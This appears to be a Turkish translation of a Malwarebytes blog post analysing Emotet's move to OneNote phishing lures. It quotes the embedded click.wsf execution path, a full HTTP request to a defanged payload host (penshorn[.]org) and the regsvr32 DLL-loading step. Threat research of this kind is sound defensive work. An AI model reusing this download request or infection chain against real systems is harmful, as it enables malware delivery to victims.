Emotet sonunda notu aldı ve Microsoft OneNote yemlerini ekledi.
Geçen hafta Emotet, botnet Epoch 4 kötü amaçlı Office makroları içeren kötü amaçlı e-postalar göndermeye başladığında üç aylık bir aradan sonra geri döndü. Ayıklanan ekler birkaç yüz megabayta şişirilmişken, Emotet’in aynı saldırı biçimini kullanmakta ısrar ettiğini görmek şaşırtıcıydı.
Gerçekten de Microsoft, geçen yazdan beri makroları indirilen belgelerden otomatik olarak engelleme girişimini başlatıyor. Bu, suçluları malspam aracılığıyla kötü amaçlı yazılımları nasıl dağıtmak istediklerini yeniden gözden geçirmeye zorladı. Göze çarpan bir değişiklik, Microsoft OneNote belgelerinin diğer birkaç suç çetesi tarafından kullanılmasıydı. Şimdi takip etme sırası Emotet’te.
OneNote dosyası basit ama yine de belgenin korunduğunu belirten sahte bir bildirimle sosyal mühendislik kullanıcıları için etkilidir. Görüntüle düğmesine çift tıklamaları istendiğinde, kurbanlar bunun yerine yanlışlıkla gömülü bir komut dosyasına çift tıklayacaktır.
Bu, aşağıdaki komutu yürütmek için Windows komut dosyası motorunu (wscript.exe) tetikler:
%Temp%\OneNote\16.0\NT\0\click.wsf"
Aşırı derecede gizlenmiş komut dosyası, Emotet ikili yükünü uzak bir siteden alır
GET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: penshorn.org
Dosya bir DLL olarak kaydedilir ve regsvr32.exe aracılığıyla yürütülür:
%Temp%\OneNote\16.0\NT\0\rad44657.tmp.dll"
Sisteme yüklendikten sonra Emotet, daha fazla talimat almak için komuta ve kontrol sunucularıyla iletişim kuracaktır.
Emotet malspam dağıtımını hızlandırırken, fidye yazılımlarını bırakmak isteyen diğer tehdit aktörleri için bir giriş noktası işlevi gördüğünden, kullanıcılar 2023 Kötü Amaçlı Yazılım Durumu Raporumuzda öne çıkardığımız bu tehdide karşı özellikle dikkatli olmalıdır.
Malwarebytes müşterileri, bu tehdide karşı web koruması ve kötü amaçlı yazılım engelleme dahil olmak üzere saldırı zincirindeki çeşitli katmanlarda korunur. EDR ürünümüz ayrıca tüm diziyi işaretler:
Emotet daha önce tatiller yapmış, emekli olmuş ve hatta yetkililer tarafından kapatılmış olsa da ciddi bir tehdit olmaya devam ediyor ve toplum mühendisliği saldırılarının ne kadar etkili olduğunun altını çiziyor. Makrolar yakında geçmişte kalabilecek olsa da, tehdit aktörlerinin kurumsal ağlarda bir dayanak elde etme nihai hedeflerine ulaşmak için çeşitli popüler iş uygulamalarından yararlanabileceğini görebiliriz.
Müşterilerimizin korunmaya devam etmesini sağlamak için Emotet ile her türlü yeni gelişmeyi izlemeye devam edeceğiz.
Aklınıza takılan bir sorunuz mu var veya siber korumamız hakkında daha fazla bilgi edinmek mi istiyorsunuz? Aşağıdan ücretsiz bir işletme deneme sürümü edinin.
BAŞLAMAK